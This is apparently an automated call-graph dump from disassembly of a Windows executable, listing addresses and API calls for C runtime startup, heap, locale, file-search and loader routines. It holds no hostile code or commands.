7ff7b110b4ec __free_lconv_num 11 API calls 19758->19763 19759->19746 19760->19756 19760->19758 19761 7ff7b110e19c _fread_nolock 12 API calls 19760->19761 19762 7ff7b11187c3 19760->19762 19761->19762 19762->19758 19764 7ff7b11101e0 _fread_nolock MultiByteToWideChar 19762->19764 19763->19756 19765 7ff7b1118836 19764->19765 19765->19758 19784 7ff7b110fb84 19765->19784 19768 7ff7b11188d2 19770 7ff7b110e19c _fread_nolock 12 API calls 19768->19770 19772 7ff7b11189a4 19768->19772 19774 7ff7b11188f0 19768->19774 19769 7ff7b1118881 19769->19758 19771 7ff7b110fb84 __crtLCMapStringW 6 API calls 19769->19771 19770->19774 19771->19758 19772->19758 19773 7ff7b110b4ec __free_lconv_num 11 API calls 19772->19773 19773->19758 19774->19758 19775 7ff7b110fb84 __crtLCMapStringW 6 API calls 19774->19775 19776 7ff7b1118970 19775->19776 19776->19772 19777 7ff7b1118990 19776->19777 19778 7ff7b11189a6 19776->19778 19779 7ff7b1110aa8 WideCharToMultiByte 19777->19779 19780 7ff7b1110aa8 WideCharToMultiByte 19778->19780 19781 7ff7b111899e 19779->19781 19780->19781 19781->19772 19782 7ff7b11189be 19781->19782 19782->19758 19783 7ff7b110b4ec __free_lconv_num 11 API calls 19782->19783 19783->19758 19785 7ff7b110f7b0 __crtLCMapStringW 5 API calls 19784->19785 19786 7ff7b110fbc2 19785->19786 19787 7ff7b110fbca 19786->19787 19790 7ff7b110fc70 19786->19790 19787->19758 19787->19768 19787->19769 19789 7ff7b110fc33 LCMapStringW 19789->19787 19791 7ff7b110f7b0 __crtLCMapStringW 5 API calls 19790->19791 19792 7ff7b110fc9e __crtLCMapStringW 19791->19792 19792->19789 16442 7ff7b110a4d1 16454 7ff7b110af48 16442->16454 16459 7ff7b110bcf0 GetLastError 16454->16459 16460 7ff7b110bd31 FlsSetValue 16459->16460 16461 7ff7b110bd14 FlsGetValue 16459->16461 16462 7ff7b110bd21 16460->16462 16463 7ff7b110bd43 16460->16463 16461->16462 16464 7ff7b110bd2b 16461->16464 16465 7ff7b110bd9d SetLastError 16462->16465 16466 7ff7b110f738 _get_daylight 11 API calls 16463->16466 16464->16460 16468 7ff7b110af51 16465->16468 16469 7ff7b110bdbd 16465->16469 16467 7ff7b110bd52 16466->16467 16471 7ff7b110bd70 FlsSetValue 16467->16471 16472 7ff7b110bd60 FlsSetValue 16467->16472 16481 7ff7b110b07c 16468->16481 16470 7ff7b110b07c __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16469->16470 16473 7ff7b110bdc2 16470->16473 16475 7ff7b110bd7c FlsSetValue 16471->16475 16476 7ff7b110bd8e 16471->16476 16474 7ff7b110bd69 16472->16474 16477 7ff7b110b4ec __free_lconv_num 11 API calls 16474->16477 16475->16474 16478 7ff7b110ba98 _get_daylight 11 API calls 16476->16478 16477->16462 16479 7ff7b110bd96 16478->16479 16480 7ff7b110b4ec __free_lconv_num 11 API calls 16479->16480 16480->16465 16490 7ff7b11142a0 16481->16490 16516 7ff7b1114258 16490->16516 16521 7ff7b1111298 EnterCriticalSection 16516->16521 19795 7ff7b10fc0d0 19796 7ff7b10fc0e0 19795->19796 19812 7ff7b110a718 19796->19812 19798 7ff7b10fc0ec 19818 7ff7b10fc3c8 19798->19818 19800 7ff7b10fc6ac 7 API calls 19803 7ff7b10fc185 19800->19803 19801 7ff7b10fc104 _RTC_Initialize 19810 7ff7b10fc159 19801->19810 19823 7ff7b10fc578 19801->19823 19804 7ff7b10fc119 19826 7ff7b1109b84 19804->19826 19810->19800 19811 7ff7b10fc175 19810->19811 19813 7ff7b110a729 19812->19813 19814 7ff7b110a731 19813->19814 19815 7ff7b1105aa4 _get_daylight 11 API calls 19813->19815 19814->19798 19816 7ff7b110a740 19815->19816 19817 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 19816->19817 19817->19814 19819 7ff7b10fc3d9 19818->19819 19822 7ff7b10fc3de __scrt_acquire_startup_lock 19818->19822 19820 7ff7b10fc6ac 7 API calls 19819->19820 19819->19822 19821 7ff7b10fc452 19820->19821 19822->19801 19851 7ff7b10fc53c 19823->19851 19825 7ff7b10fc581 19825->19804 19827 7ff7b1109ba4 19826->19827 19833 7ff7b10fc125 19826->19833 19828 7ff7b1109bac 19827->19828 19829 7ff7b1109bc2 GetModuleFileNameW 19827->19829 19830 7ff7b1105aa4 _get_daylight 11 API calls 19828->19830 19834 7ff7b1109bed 19829->19834 19831 7ff7b1109bb1 19830->19831 19832 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 19831->19832 19832->19833 19833->19810 19850 7ff7b10fc64c InitializeSListHead 19833->19850 19835 7ff7b1109b24 11 API calls 19834->19835 19836 7ff7b1109c2d 19835->19836 19837 7ff7b1109c35 19836->19837 19842 7ff7b1109c4d 19836->19842 19838 7ff7b1105aa4 _get_daylight 11 API calls 19837->19838 19839 7ff7b1109c3a 19838->19839 19840 7ff7b110b4ec __free_lconv_num 11 API calls 19839->19840 19840->19833 19841 7ff7b1109c6f 19843 7ff7b110b4ec __free_lconv_num 11 API calls 19841->19843 19842->19841 19844 7ff7b1109c9b 19842->19844 19845 7ff7b1109cb4 19842->19845 19843->19833 19846 7ff7b110b4ec __free_lconv_num 11 API calls 19844->19846 19848 7ff7b110b4ec __free_lconv_num 11 API calls 19845->19848 19847 7ff7b1109ca4 19846->19847 19849 7ff7b110b4ec __free_lconv_num 11 API calls 19847->19849 19848->19841 19849->19833 19852 7ff7b10fc556 19851->19852 19854 7ff7b10fc54f 19851->19854 19855 7ff7b110ad5c 19852->19855 19854->19825 19858 7ff7b110a998 19855->19858 19865 7ff7b1111298 EnterCriticalSection 19858->19865 16525 7ff7b10fb0cc 16526 7ff7b10fa3ca 16525->16526 16528 7ff7b10fa446 16526->16528 16529 7ff7b10fb640 16526->16529 16530 7ff7b10fb663 16529->16530 16531 7ff7b10fb67f memcpy_s 16529->16531 16533 7ff7b110e19c 16530->16533 16531->16528 16534 7ff7b110e1e7 16533->16534 16535 7ff7b110e1ab _get_daylight 16533->16535 16536 7ff7b1105aa4 _get_daylight 11 API calls 16534->16536 16535->16534 16537 7ff7b110e1ce RtlAllocateHeap 16535->16537 16539 7ff7b11141e0 _get_daylight 2 API calls 16535->16539 16538 7ff7b110e1e5 16536->16538 16537->16535 16537->16538 16538->16531 16539->16535 19875 7ff7b111bca9 19876 7ff7b111bcb8 19875->19876 19878 7ff7b111bcc2 19875->19878 19879 7ff7b11112f8 LeaveCriticalSection 19876->19879 16184 7ff7b110842c 16185 7ff7b110845a 16184->16185 16186 7ff7b1108493 16184->16186 16264 7ff7b1105aa4 16185->16264 16186->16185 16187 7ff7b1108498 FindFirstFileExW 16186->16187 16189 7ff7b11084ba GetLastError 16187->16189 16190 7ff7b1108501 16187->16190 16193 7ff7b11084f1 16189->16193 16194 7ff7b11084c5 16189->16194 16244 7ff7b110869c 16190->16244 16197 7ff7b1105aa4 _get_daylight 11 API calls 16193->16197 16194->16193 16200 7ff7b11084cf 16194->16200 16201 7ff7b11084e1 16194->16201 16196 7ff7b110846a 16269 7ff7b10fbe00 16196->16269 16197->16196 16199 7ff7b110869c _wfindfirst32i64 10 API calls 16203 7ff7b1108527 16199->16203 16200->16193 16204 7ff7b11084d4 16200->16204 16205 7ff7b1105aa4 _get_daylight 11 API calls 16201->16205 16207 7ff7b110869c _wfindfirst32i64 10 API calls 16203->16207 16208 7ff7b1105aa4 _get_daylight 11 API calls 16204->16208 16205->16196 16209 7ff7b1108535 16207->16209 16208->16196 16251 7ff7b1111434 16209->16251 16212 7ff7b110855f 16260 7ff7b110b4a4 IsProcessorFeaturePresent 16212->16260 16245 7ff7b11086ba FileTimeToSystemTime 16244->16245 16246 7ff7b11086b4 16244->16246 16247 7ff7b11086c9 SystemTimeToTzSpecificLocalTime 16245->16247 16248 7ff7b11086df 16245->16248 16246->16245 16246->16248 16247->16248 16249 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16248->16249 16250 7ff7b1108519 16249->16250 16250->16199 16252 7ff7b111144b 16251->16252 16253 7ff7b1111441 16251->16253 16254 7ff7b1105aa4 _get_daylight 11 API calls 16252->16254 16253->16252 16257 7ff7b1111467 16253->16257 16259 7ff7b1111453 16254->16259 16255 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 16256 7ff7b1108553 16255->16256 16256->16196 16256->16212 16257->16256 16258 7ff7b1105aa4 _get_daylight 11 API calls 16257->16258 16258->16259 16259->16255 16261 7ff7b110b4b7 16260->16261 16278 7ff7b110b1b8 16261->16278 16286 7ff7b110be68 GetLastError 16264->16286 16266 7ff7b1105aad 16267 7ff7b110b484 16266->16267 16344 7ff7b110b31c 16267->16344 16270 7ff7b10fbe09 16269->16270 16271 7ff7b10fbe14 16270->16271 16272 7ff7b10fbe60 IsProcessorFeaturePresent 16270->16272 16273 7ff7b10fbe78 16272->16273 16382 7ff7b10fc054 RtlCaptureContext 16273->16382 16279 7ff7b110b1f2 _wfindfirst32i64 memcpy_s 16278->16279 16280 7ff7b110b21a RtlCaptureContext RtlLookupFunctionEntry 16279->16280 16281 7ff7b110b28a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16280->16281 16282 7ff7b110b254 RtlVirtualUnwind 16280->16282 16283 7ff7b110b2dc _wfindfirst32i64 16281->16283 16282->16281 16284 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16283->16284 16285 7ff7b110b2fb GetCurrentProcess TerminateProcess 16284->16285 16287 7ff7b110bea9 FlsSetValue 16286->16287 16288 7ff7b110be8c 16286->16288 16289 7ff7b110bebb 16287->16289 16300 7ff7b110be99 SetLastError 16287->16300 16288->16287 16288->16300 16303 7ff7b110f738 16289->16303 16293 7ff7b110bee8 FlsSetValue 16296 7ff7b110bef4 FlsSetValue 16293->16296 16297 7ff7b110bf06 16293->16297 16294 7ff7b110bed8 FlsSetValue 16295 7ff7b110bee1 16294->16295 16310 7ff7b110b4ec 16295->16310 16296->16295 16316 7ff7b110ba98 16297->16316 16300->16266 16309 7ff7b110f749 _get_daylight 16303->16309 16304 7ff7b110f79a 16306 7ff7b1105aa4 _get_daylight 10 API calls 16304->16306 16305 7ff7b110f77e RtlAllocateHeap 16307 7ff7b110beca 16305->16307 16305->16309 16306->16307 16307->16293 16307->16294 16309->16304 16309->16305 16321 7ff7b11141e0 16309->16321 16311 7ff7b110b520 16310->16311 16312 7ff7b110b4f1 RtlRestoreThreadPreferredUILanguages 16310->16312 16311->16300 16312->16311 16313 7ff7b110b50c GetLastError 16312->16313 16314 7ff7b110b519 __free_lconv_num 16313->16314 16315 7ff7b1105aa4 _get_daylight 9 API calls 16314->16315 16315->16311 16330 7ff7b110b970 16316->16330 16324 7ff7b1114220 16321->16324 16329 7ff7b1111298 EnterCriticalSection 16324->16329 16342 7ff7b1111298 EnterCriticalSection 16330->16342 16345 7ff7b110b347 16344->16345 16348 7ff7b110b3b8 16345->16348 16347 7ff7b110b36e 16356 7ff7b110b100 16348->16356 16351 7ff7b110b3f3 16351->16347 16354 7ff7b110b4a4 _wfindfirst32i64 17 API calls 16355 7ff7b110b483 16354->16355 16357 7ff7b110b157 16356->16357 16358 7ff7b110b11c GetLastError 16356->16358 16357->16351 16362 7ff7b110b16c 16357->16362 16359 7ff7b110b12c 16358->16359 16365 7ff7b110bf30 16359->16365 16363 7ff7b110b188 GetLastError SetLastError 16362->16363 16364 7ff7b110b1a0 16362->16364 16363->16364 16364->16351 16364->16354 16366 7ff7b110bf6a FlsSetValue 16365->16366 16367 7ff7b110bf4f FlsGetValue 16365->16367 16369 7ff7b110bf77 16366->16369 16370 7ff7b110b147 SetLastError 16366->16370 16368 7ff7b110bf64 16367->16368 16367->16370 16368->16366 16371 7ff7b110f738 _get_daylight 11 API calls 16369->16371 16370->16357 16372 7ff7b110bf86 16371->16372 16373 7ff7b110bfa4 FlsSetValue 16372->16373 16374 7ff7b110bf94 FlsSetValue 16372->16374 16376 7ff7b110bfb0 FlsSetValue 16373->16376 16377 7ff7b110bfc2 16373->16377 16375 7ff7b110bf9d 16374->16375 16378 7ff7b110b4ec __free_lconv_num 11 API calls 16375->16378 16376->16375 16379 7ff7b110ba98 _get_daylight 11 API calls 16377->16379 16378->16370 16380 7ff7b110bfca 16379->16380 16381 7ff7b110b4ec __free_lconv_num 11 API calls 16380->16381 16381->16370 16383 7ff7b10fc06e RtlLookupFunctionEntry 16382->16383 16384 7ff7b10fc084 RtlVirtualUnwind 16383->16384 16385 7ff7b10fbe8b 16383->16385 16384->16383 16384->16385 16386 7ff7b10fbe20 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16385->16386 16540 7ff7b10fc1bc 16561 7ff7b10fc38c 16540->16561 16543 7ff7b10fc308 16661 7ff7b10fc6ac IsProcessorFeaturePresent 16543->16661 16544 7ff7b10fc1d8 __scrt_acquire_startup_lock 16546 7ff7b10fc312 16544->16546 16550 7ff7b10fc1f6 __scrt_release_startup_lock 16544->16550 16547 7ff7b10fc6ac 7 API calls 16546->16547 16549 7ff7b10fc31d __FrameHandler3::FrameUnwindToEmptyState 16547->16549 16548 7ff7b10fc21b 16550->16548 16551 7ff7b10fc2a1 16550->16551 16650 7ff7b110a69c 16550->16650 16567 7ff7b10fc7f4 16551->16567 16553 7ff7b10fc2a6 16570 7ff7b10f1000 16553->16570 16558 7ff7b10fc2c9 16558->16549 16657 7ff7b10fc510 16558->16657 16562 7ff7b10fc394 16561->16562 16563 7ff7b10fc3a0 __scrt_dllmain_crt_thread_attach 16562->16563 16564 7ff7b10fc1d0 16563->16564 16565 7ff7b10fc3ad 16563->16565 16564->16543 16564->16544 16565->16564 16668 7ff7b10fcfb0 16565->16668 16695 7ff7b111b380 16567->16695 16569 7ff7b10fc80b GetStartupInfoW 16569->16553 16571 7ff7b10f100b 16570->16571 16697 7ff7b10f87a0 16571->16697 16573 7ff7b10f101d 16704 7ff7b11064d8 16573->16704 16575 7ff7b10f39ab 16711 7ff7b10f1ea0 16575->16711 16579 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16580 7ff7b10f3b73 16579->16580 16655 7ff7b10fc838 GetModuleHandleW 16580->16655 16581 7ff7b10f39ca 16644 7ff7b10f3ab2 16581->16644 16727 7ff7b10f7b60 16581->16727 16583 7ff7b10f39ff 16584 7ff7b10f3a4b 16583->16584 16585 7ff7b10f7b60 61 API calls 16583->16585 16742 7ff7b10f8040 16584->16742 16590 7ff7b10f3a20 __std_exception_copy 16585->16590 16587 7ff7b10f3a60 16746 7ff7b10f1ca0 16587->16746 16590->16584 16595 7ff7b10f8040 58 API calls 16590->16595 16591 7ff7b10f3b2d 16593 7ff7b10f3b8d 16591->16593 16765 7ff7b10f8970 16591->16765 16592 7ff7b10f1ca0 121 API calls 16594 7ff7b10f3a96 16592->16594 16598 7ff7b10f3bdb 16593->16598 16593->16644 16789 7ff7b10f8bd0 16593->16789 16596 7ff7b10f3a9a 16594->16596 16597 7ff7b10f3ab7 16594->16597 16595->16584 16865 7ff7b10f2b10 16596->16865 16597->16591 16878 7ff7b10f3fc0 16597->16878 16803 7ff7b10f6de0 16598->16803 16602 7ff7b10f3bc0 16606 7ff7b10f3b53 16602->16606 16607 7ff7b10f3bce SetDllDirectoryW 16602->16607 16612 7ff7b10f2b10 59 API calls 16606->16612 16607->16598 16611 7ff7b10f3ad5 16616 7ff7b10f2b10 59 API calls 16611->16616 16612->16644 16615 7ff7b10f3bf5 16640 7ff7b10f3c27 16615->16640 16910 7ff7b10f65f0 16615->16910 16616->16644 16617 7ff7b10f3b03 16617->16591 16621 7ff7b10f3b08 16617->16621 16618 7ff7b10f3ce6 16807 7ff7b10f34a0 16618->16807 16897 7ff7b110076c 16621->16897 16625 7ff7b10f3c46 16631 7ff7b10f3c88 16625->16631 16946 7ff7b10f1ee0 16625->16946 16626 7ff7b10f3c29 16630 7ff7b10f6840 FreeLibrary 16626->16630 16630->16640 16631->16644 16950 7ff7b10f3440 16631->16950 16633 7ff7b10f3d00 16815 7ff7b10f7fd0 16633->16815 16634 7ff7b10f3c18 16940 7ff7b10f6c30 16634->16940 16638 7ff7b10f3d13 16641 7ff7b10f7b60 61 API calls 16638->16641 16639 7ff7b10f3cc1 16643 7ff7b10f6840 FreeLibrary 16639->16643 16640->16618 16640->16625 16642 7ff7b10f3d1f 16641->16642 16822 7ff7b10f8080 16642->16822 16643->16644 16644->16579 16651 7ff7b110a6b3 16650->16651 16652 7ff7b110a6d4 16650->16652 16651->16551 16653 7ff7b110af48 45 API calls 16652->16653 16654 7ff7b110a6d9 16653->16654 16656 7ff7b10fc849 16655->16656 16656->16558 16658 7ff7b10fc521 16657->16658 16659 7ff7b10fc2e0 16658->16659 16660 7ff7b10fcfb0 7 API calls 16658->16660 16659->16548 16660->16659 16662 7ff7b10fc6d2 _wfindfirst32i64 memcpy_s 16661->16662 16663 7ff7b10fc6f1 RtlCaptureContext RtlLookupFunctionEntry 16662->16663 16664 7ff7b10fc756 memcpy_s 16663->16664 16665 7ff7b10fc71a RtlVirtualUnwind 16663->16665 16666 7ff7b10fc788 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16664->16666 16665->16664 16667 7ff7b10fc7d6 _wfindfirst32i64 16666->16667 16667->16546 16669 7ff7b10fcfc2 16668->16669 16670 7ff7b10fcfb8 16668->16670 16669->16564 16674 7ff7b10fd354 16670->16674 16675 7ff7b10fd363 16674->16675 16676 7ff7b10fcfbd 16674->16676 16682 7ff7b10fe350 16675->16682 16678 7ff7b10fd3c0 16676->16678 16679 7ff7b10fd3eb 16678->16679 16680 7ff7b10fd3ef 16679->16680 16681 7ff7b10fd3ce DeleteCriticalSection 16679->16681 16680->16669 16681->16679 16686 7ff7b10fe1b8 16682->16686 16687 7ff7b10fe2a2 TlsFree 16686->16687 16692 7ff7b10fe1fc __vcrt_InitializeCriticalSectionEx 16686->16692 16688 7ff7b10fe22a LoadLibraryExW 16689 7ff7b10fe24b GetLastError 16688->16689 16690 7ff7b10fe2c9 16688->16690 16689->16692 16691 7ff7b10fe2e9 GetProcAddress 16690->16691 16693 7ff7b10fe2e0 FreeLibrary 16690->16693 16691->16687 16692->16687 16692->16688 16692->16691 16694 7ff7b10fe26d LoadLibraryExW 16692->16694 16693->16691 16694->16690 16694->16692 16696 7ff7b111b370 16695->16696 16696->16569 16696->16696 16699 7ff7b10f87bf 16697->16699 16698 7ff7b10f8810 WideCharToMultiByte 16698->16699 16702 7ff7b10f88b6 16698->16702 16699->16698 16701 7ff7b10f8864 WideCharToMultiByte 16699->16701 16699->16702 16703 7ff7b10f87c7 __std_exception_copy 16699->16703 16701->16699 16701->16702 16984 7ff7b10f29c0 16702->16984 16703->16573 16707 7ff7b1110630 16704->16707 16705 7ff7b1110683 16706 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 16705->16706 16710 7ff7b11106ac 16706->16710 16707->16705 16708 7ff7b11106d6 16707->16708 17343 7ff7b1110508 16708->17343 16710->16575 16712 7ff7b10f1eb5 16711->16712 16713 7ff7b10f1ed0 16712->16713 17351 7ff7b10f2870 16712->17351 16713->16644 16715 7ff7b10f3eb0 16713->16715 16716 7ff7b10fbda0 16715->16716 16717 7ff7b10f3ebc GetModuleFileNameW 16716->16717 16718 7ff7b10f3f02 16717->16718 16719 7ff7b10f3eeb 16717->16719 17391 7ff7b10f8ce0 16718->17391 16721 7ff7b10f29c0 57 API calls 16719->16721 16722 7ff7b10f3efe 16721->16722 16725 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16722->16725 16724 7ff7b10f2b10 59 API calls 16724->16722 16726 7ff7b10f3f3f 16725->16726 16726->16581 16728 7ff7b10f7b6a 16727->16728 16729 7ff7b10f8bd0 57 API calls 16728->16729 16730 7ff7b10f7b8c GetEnvironmentVariableW 16729->16730 16731 7ff7b10f7bf6 16730->16731 16732 7ff7b10f7ba4 ExpandEnvironmentStringsW 16730->16732 16733 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16731->16733 16734 7ff7b10f8ce0 59 API calls 16732->16734 16735 7ff7b10f7c08 16733->16735 16736 7ff7b10f7bcc 16734->16736 16735->16583 16736->16731 16737 7ff7b10f7bd6 16736->16737 17402 7ff7b110af7c 16737->17402 16740 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16741 7ff7b10f7bee 16740->16741 16741->16583 16743 7ff7b10f8bd0 57 API calls 16742->16743 16744 7ff7b10f8057 SetEnvironmentVariableW 16743->16744 16745 7ff7b10f806f __std_exception_copy 16744->16745 16745->16587 16747 7ff7b10f1cae 16746->16747 16748 7ff7b10f1ee0 49 API calls 16747->16748 16749 7ff7b10f1ce4 16748->16749 16750 7ff7b10f1ee0 49 API calls 16749->16750 16760 7ff7b10f1dce 16749->16760 16751 7ff7b10f1d0a 16750->16751 16751->16760 17409 7ff7b10f1a90 16751->17409 16752 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16753 7ff7b10f1e5c 16752->16753 16753->16591 16753->16592 16757 7ff7b10f1dbc 16758 7ff7b10f3e30 49 API calls 16757->16758 16758->16760 16759 7ff7b10f1d7f 16759->16757 16761 7ff7b10f1e24 16759->16761 16760->16752 16762 7ff7b10f3e30 49 API calls 16761->16762 16763 7ff7b10f1e31 16762->16763 17445 7ff7b10f4040 16763->17445 16766 7ff7b10f8985 16765->16766 17487 7ff7b10f8650 GetCurrentProcess OpenProcessToken 16766->17487 16769 7ff7b10f8650 7 API calls 16770 7ff7b10f89b1 16769->16770 16771 7ff7b10f89e4 16770->16771 16772 7ff7b10f89ca 16770->16772 16774 7ff7b10f8740 48 API calls 16771->16774 17497 7ff7b10f8740 16772->17497 16776 7ff7b10f89f7 LocalFree LocalFree 16774->16776 16777 7ff7b10f8a13 16776->16777 16779 7ff7b10f8a1f 16776->16779 17501 7ff7b10f2c30 16777->17501 16780 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16779->16780 16781 7ff7b10f3b4e 16780->16781 16781->16606 16782 7ff7b10f14e0 16781->16782 16783 7ff7b10f156f 16782->16783 16784 7ff7b10f14f6 16782->16784 16783->16593 17708 7ff7b10f7950 16784->17708 16787 7ff7b10f2b10 59 API calls 16788 7ff7b10f1554 16787->16788 16788->16593 16790 7ff7b10f8bf1 MultiByteToWideChar 16789->16790 16791 7ff7b10f8c77 MultiByteToWideChar 16789->16791 16792 7ff7b10f8c3c 16790->16792 16793 7ff7b10f8c17 16790->16793 16794 7ff7b10f8cbf 16791->16794 16795 7ff7b10f8c9a 16791->16795 16792->16791 16800 7ff7b10f8c52 16792->16800 16796 7ff7b10f29c0 55 API calls 16793->16796 16794->16602 16797 7ff7b10f29c0 55 API calls 16795->16797 16798 7ff7b10f8c2a 16796->16798 16799 7ff7b10f8cad 16797->16799 16798->16602 16799->16602 16801 7ff7b10f29c0 55 API calls 16800->16801 16802 7ff7b10f8c65 16801->16802 16802->16602 16804 7ff7b10f6df5 16803->16804 16805 7ff7b10f2870 59 API calls 16804->16805 16806 7ff7b10f3be0 16804->16806 16805->16806 16806->16640 16901 7ff7b10f6a90 16806->16901 16808 7ff7b10f3513 16807->16808 16809 7ff7b10f3554 16807->16809 16808->16809 18031 7ff7b10f1700 16808->18031 18073 7ff7b10f2d50 16808->18073 16810 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16809->16810 16811 7ff7b10f35a5 16810->16811 16811->16644 16814 7ff7b10f8940 LocalFree 16811->16814 16814->16633 16816 7ff7b10f8bd0 57 API calls 16815->16816 16817 7ff7b10f7fef 16816->16817 16818 7ff7b10f8bd0 57 API calls 16817->16818 16819 7ff7b10f7fff 16818->16819 16820 7ff7b11083cc 38 API calls 16819->16820 16821 7ff7b10f800d __std_exception_copy 16820->16821 16821->16638 16823 7ff7b10f8090 16822->16823 16824 7ff7b10f8bd0 57 API calls 16823->16824 16825 7ff7b10f80c1 SetConsoleCtrlHandler GetStartupInfoW 16824->16825 16826 7ff7b10f8122 16825->16826 18550 7ff7b110aff4 16826->18550 16830 7ff7b10f8131 16866 7ff7b10f2b30 16865->16866 16867 7ff7b11050a4 49 API calls 16866->16867 16868 7ff7b10f2b7b memcpy_s 16867->16868 16869 7ff7b10f8bd0 57 API calls 16868->16869 16870 7ff7b10f2bb0 16869->16870 16871 7ff7b10f2bb5 16870->16871 16872 7ff7b10f2bed MessageBoxA 16870->16872 16873 7ff7b10f8bd0 57 API calls 16871->16873 16874 7ff7b10f2c07 16872->16874 16875 7ff7b10f2bcf MessageBoxW 16873->16875 16876 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16874->16876 16875->16874 16877 7ff7b10f2c17 16876->16877 16877->16644 16879 7ff7b10f3fcc 16878->16879 16880 7ff7b10f8bd0 57 API calls 16879->16880 16881 7ff7b10f3ff7 16880->16881 16882 7ff7b10f8bd0 57 API calls 16881->16882 16883 7ff7b10f400a 16882->16883 18606 7ff7b1106a88 16883->18606 16886 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16887 7ff7b10f3acd 16886->16887 16887->16611 16888 7ff7b10f82b0 16887->16888 16889 7ff7b10f82d4 16888->16889 16890 7ff7b1100df4 73 API calls 16889->16890 16891 7ff7b10f83ab __std_exception_copy 16889->16891 16892 7ff7b10f82ee 16890->16892 16891->16617 16892->16891 18985 7ff7b1109650 16892->18985 16894 7ff7b1100df4 73 API calls 16896 7ff7b10f8303 16894->16896 16895 7ff7b1100abc _fread_nolock 53 API calls 16895->16896 16896->16891 16896->16894 16896->16895 16898 7ff7b110079c 16897->16898 19000 7ff7b1100548 16898->19000 16900 7ff7b11007b5 16900->16611 16902 7ff7b10f6ab3 16901->16902 16903 7ff7b10f6aca 16901->16903 16902->16903 19011 7ff7b10f1590 16902->19011 16903->16615 16905 7ff7b10f6ad4 16905->16903 16906 7ff7b10f4040 49 API calls 16905->16906 16907 7ff7b10f6b35 16906->16907 16908 7ff7b10f2b10 59 API calls 16907->16908 16909 7ff7b10f6ba5 __std_exception_copy memcpy_s 16907->16909 16908->16903 16909->16615 16923 7ff7b10f660a memcpy_s 16910->16923 16912 7ff7b10f672f 16914 7ff7b10f4040 49 API calls 16912->16914 16913 7ff7b10f674b 16915 7ff7b10f2b10 59 API calls 16913->16915 16916 7ff7b10f67a8 16914->16916 16921 7ff7b10f6741 __std_exception_copy 16915->16921 16919 7ff7b10f4040 49 API calls 16916->16919 16917 7ff7b10f4040 49 API calls 16917->16923 16918 7ff7b10f6710 16918->16912 16922 7ff7b10f4040 49 API calls 16918->16922 16920 7ff7b10f67d8 16919->16920 16926 7ff7b10f4040 49 API calls 16920->16926 16924 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16921->16924 16922->16912 16923->16912 16923->16913 16923->16917 16923->16918 16923->16923 16927 7ff7b10f1700 135 API calls 16923->16927 16928 7ff7b10f6731 16923->16928 19035 7ff7b10f1940 16923->19035 16925 7ff7b10f3c06 16924->16925 16925->16626 16930 7ff7b10f6570 16925->16930 16926->16921 16927->16923 16929 7ff7b10f2b10 59 API calls 16928->16929 16929->16921 19039 7ff7b10f8260 16930->19039 16932 7ff7b10f658c 16933 7ff7b10f8260 58 API calls 16932->16933 16934 7ff7b10f659f 16933->16934 16935 7ff7b10f65d5 16934->16935 16936 7ff7b10f65b7 16934->16936 16937 7ff7b10f2b10 59 API calls 16935->16937 19043 7ff7b10f6ef0 GetProcAddress 16936->19043 16939 7ff7b10f3c14 16937->16939 16939->16626 16939->16634 16941 7ff7b10f6c54 16940->16941 16942 7ff7b10f2b10 59 API calls 16941->16942 16945 7ff7b10f6cca 16941->16945 16943 7ff7b10f6cae 16942->16943 16944 7ff7b10f6840 FreeLibrary 16943->16944 16944->16945 16945->16640 16947 7ff7b10f1f05 16946->16947 16948 7ff7b11050a4 49 API calls 16947->16948 16949 7ff7b10f1f28 16948->16949 16949->16631 19102 7ff7b10f5bc0 16950->19102 16953 7ff7b10f348d 16953->16639 16955 7ff7b10f3464 16955->16953 19171 7ff7b10f5920 16955->19171 16957 7ff7b10f3470 16957->16953 19180 7ff7b10f5a90 16957->19180 17003 7ff7b10fbda0 16984->17003 16987 7ff7b10f2a09 17005 7ff7b11050a4 16987->17005 16992 7ff7b10f1ee0 49 API calls 16993 7ff7b10f2a66 memcpy_s 16992->16993 16994 7ff7b10f8bd0 54 API calls 16993->16994 16995 7ff7b10f2a9b 16994->16995 16996 7ff7b10f2aa0 16995->16996 16997 7ff7b10f2ad8 MessageBoxA 16995->16997 16998 7ff7b10f8bd0 54 API calls 16996->16998 16999 7ff7b10f2af2 16997->16999 17000 7ff7b10f2aba MessageBoxW 16998->17000 17001 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16999->17001 17000->16999 17002 7ff7b10f2b02 17001->17002 17002->16703 17004 7ff7b10f29dc GetLastError 17003->17004 17004->16987 17008 7ff7b11050fe 17005->17008 17006 7ff7b1105123 17009 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17006->17009 17007 7ff7b110515f 17035 7ff7b1103330 17007->17035 17008->17006 17008->17007 17011 7ff7b110514d 17009->17011 17013 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17011->17013 17012 7ff7b1105208 17020 7ff7b1105211 17012->17020 17021 7ff7b110523c 17012->17021 17016 7ff7b10f2a37 17013->17016 17014 7ff7b110b4ec __free_lconv_num 11 API calls 17014->17011 17023 7ff7b10f8560 17016->17023 17017 7ff7b1105260 17018 7ff7b110526a 17017->17018 17017->17021 17022 7ff7b110b4ec __free_lconv_num 11 API calls 17018->17022 17019 7ff7b110b4ec __free_lconv_num 11 API calls 17019->17011 17020->17019 17021->17014 17022->17011 17024 7ff7b10f856c 17023->17024 17025 7ff7b10f858d FormatMessageW 17024->17025 17026 7ff7b10f8587 GetLastError 